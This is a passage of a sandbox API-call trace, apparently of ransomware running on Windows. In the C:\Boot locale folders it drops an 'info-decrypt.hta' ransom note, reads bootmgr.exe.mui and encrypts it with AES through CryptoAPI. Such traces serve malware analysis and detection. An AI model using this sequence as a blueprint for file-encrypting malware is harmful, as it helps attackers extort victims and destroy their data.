lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.764] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.764] FindClose (in: hFindFile=0xb7fa10 | out: hFindFile=0xb7fa10) returned 1 [0188.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0188.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0188.765] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0188.765] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0188.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0188.765] GetFileAttributesExW (in: lpFileName="C:\\Boot\\tr-TR\\info-decrypt.hta" (normalized: "c:\\boot\\tr-tr\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0188.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0188.765] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0188.765] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0188.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0188.765] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\info-decrypt.hta" (normalized: "c:\\boot\\tr-tr\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4e0 [0188.766] GetFileType (hFile=0x4e0) returned 0x1 [0188.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0188.766] GetFileType (hFile=0x4e0) returned 0x1 [0188.766] WriteFile (in: hFile=0x4e0, lpBuffer=0x3693b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x3693b60*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0188.767] WriteFile (in: hFile=0x4e0, lpBuffer=0x3693b60*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x3693b60*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0188.767] CloseHandle (hObject=0x4e0) returned 1 [0188.768] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0188.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0188.768] GetFileAttributesExW (in: lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x3694b7c | out: lpFileInformation=0x3694b7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440)) returned 1 [0188.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0188.768] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0188.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0188.768] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0188.768] GetFileType (hFile=0x4e0) returned 0x1 [0188.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0188.768] GetFileType (hFile=0x4e0) returned 0x1 [0188.768] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x15440 [0188.769] ReadFile (in: hFile=0x4e0, lpBuffer=0x6f94ac8, nNumberOfBytesToRead=0x15440, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x6f94ac8*, lpNumberOfBytesRead=0x6a7f1bc*=0x15440, lpOverlapped=0x0) returned 1 [0188.770] CloseHandle (hObject=0x4e0) returned 1 [0188.771] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66ba498) returned 1 [0188.772] CryptGenRandom (in: hProv=0x66ba498, dwLen=0x10, pbBuffer=0x36953ac | out: pbBuffer=0x36953ac) returned 1 [0192.905] CryptImportKey (in: hProv=0x66ba498, pbData=0x36c0ef0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f190) returned 1 [0192.906] CryptContextAddRef (hProv=0x66ba498, pdwReserved=0x0, dwFlags=0x0) returned 1 [0192.906] CryptContextAddRef (hProv=0x66ba498, pdwReserved=0x0, dwFlags=0x0) returned 1 [0192.906] CryptDuplicateKey (in: hKey=0xb7f190, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7fa50) returned 1 [0192.906] CryptContextAddRef (hProv=0x66ba498, pdwReserved=0x0, dwFlags=0x0) returned 1 [0192.906] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x4, pbData=0x36c0fd0*=0x1, dwFlags=0x0) returned 1 [0192.906] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x1, pbData=0x36c0f9c, dwFlags=0x0) returned 1 [0192.907] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x7114ee8*, pdwDataLen=0x6a7f188*=0x15450, dwBufLen=0x15450 | out: pbData=0x7114ee8*, pdwDataLen=0x6a7f188*=0x15450) returned 1 [0192.908] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36c0ff8*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x36c0ff8*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0192.909] CryptDestroyKey (hKey=0xb7f190) returned 1 [0192.909] CryptReleaseContext (hProv=0x66ba498, dwFlags=0x0) returned 1 [0192.909] CryptReleaseContext (hProv=0x66ba498, dwFlags=0x0) returned 1 [0192.909] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0192.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0192.910] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0193.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0193.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0193.114] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0193.114] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\", lpFilePart=0x0) returned 0xe [0193.114] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.115] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.115] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0193.115] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0193.115] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0193.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0193.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0193.116] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0193.116] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\", lpFilePart=0x0) returned 0xe [0193.116] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.116] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.116] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0193.117] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0193.117] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0193.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0193.117] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0193.117] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0193.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0193.117] GetFileAttributesExW (in: lpFileName="C:\\Boot\\zh-CN\\info-decrypt.hta" (normalized: "c:\\boot\\zh-cn\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0193.118] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0193.118] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0193.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0193.118] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\info-decrypt.hta" (normalized: "c:\\boot\\zh-cn\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4a8 [0193.118] GetFileType (hFile=0x4a8) returned 0x1 [0193.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0193.118] GetFileType (hFile=0x4a8) returned 0x1 [0193.119] WriteFile (in: hFile=0x4a8, lpBuffer=0x36dce80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x36dce80*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0193.120] WriteFile (in: hFile=0x4a8, lpBuffer=0x36dce80*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x36dce80*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0193.120] CloseHandle (hObject=0x4a8) returned 1 [0193.121] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0193.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0193.121] GetFileAttributesExW (in: lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x36dde9c | out: lpFileInformation=0x36dde9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440)) returned 1 [0193.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0193.121] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0193.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0193.121] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0193.121] GetFileType (hFile=0x4a8) returned 0x1 [0193.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0193.122] GetFileType (hFile=0x4a8) returned 0x1 [0193.122] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x11440 [0193.122] ReadFile (in: hFile=0x4a8, lpBuffer=0x36de014, nNumberOfBytesToRead=0x11440, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x36de014*, lpNumberOfBytesRead=0x6a7f1bc*=0x11440, lpOverlapped=0x0) returned 1 [0193.137] CloseHandle (hObject=0x4a8) returned 1 [0193.137] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66ba8d8) returned 1 [0193.138] CryptGenRandom (in: hProv=0x66ba8d8, dwLen=0x10, pbBuffer=0x36ef7a8 | out: pbBuffer=0x36ef7a8) returned 1 [0194.021] CryptImportKey (in: hProv=0x66ba8d8, pbData=0x38aebfc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f010) returned 1 [0194.021] CryptContextAddRef (hProv=0x66ba8d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.021] CryptContextAddRef (hProv=0x66ba8d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.021] CryptDuplicateKey (in: hKey=0xb7f010, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f3d0) returned 1 [0194.021] CryptContextAddRef (hProv=0x66ba8d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.021] CryptSetKeyParam (hKey=0xb7f3d0, dwParam=0x4, pbData=0x38aecdc*=0x1, dwFlags=0x0) returned 1 [0194.021] CryptSetKeyParam (hKey=0xb7f3d0, dwParam=0x1, pbData=0x38aeca8, dwFlags=0x0) returned 1 [0194.021] CryptEncrypt (in: hKey=0xb7f3d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38aecec*, pdwDataLen=0x6a7f188*=0x11450, dwBufLen=0x11450 | out: pbData=0x38aecec*, pdwDataLen=0x6a7f188*=0x11450) returned 1 [0194.022] CryptEncrypt (in: hKey=0xb7f3d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38c0160*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x38c0160*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0194.023] CryptDestroyKey (hKey=0xb7f010) returned 1 [0194.023] CryptReleaseContext (hProv=0x66ba8d8, dwFlags=0x0) returned 1 [0194.023] CryptReleaseContext (hProv=0x66ba8d8, dwFlags=0x0) returned 1 [0194.024] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0194.024] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0194.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0194.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0194.025] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0194.025] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\", lpFilePart=0x0) returned 0xe [0194.025] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f010 [0194.026] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.026] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0194.026] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0194.026] FindClose (in: hFindFile=0xb7f010 | out: hFindFile=0xb7f010) returned 1 [0194.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0194.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0194.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0194.027] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", 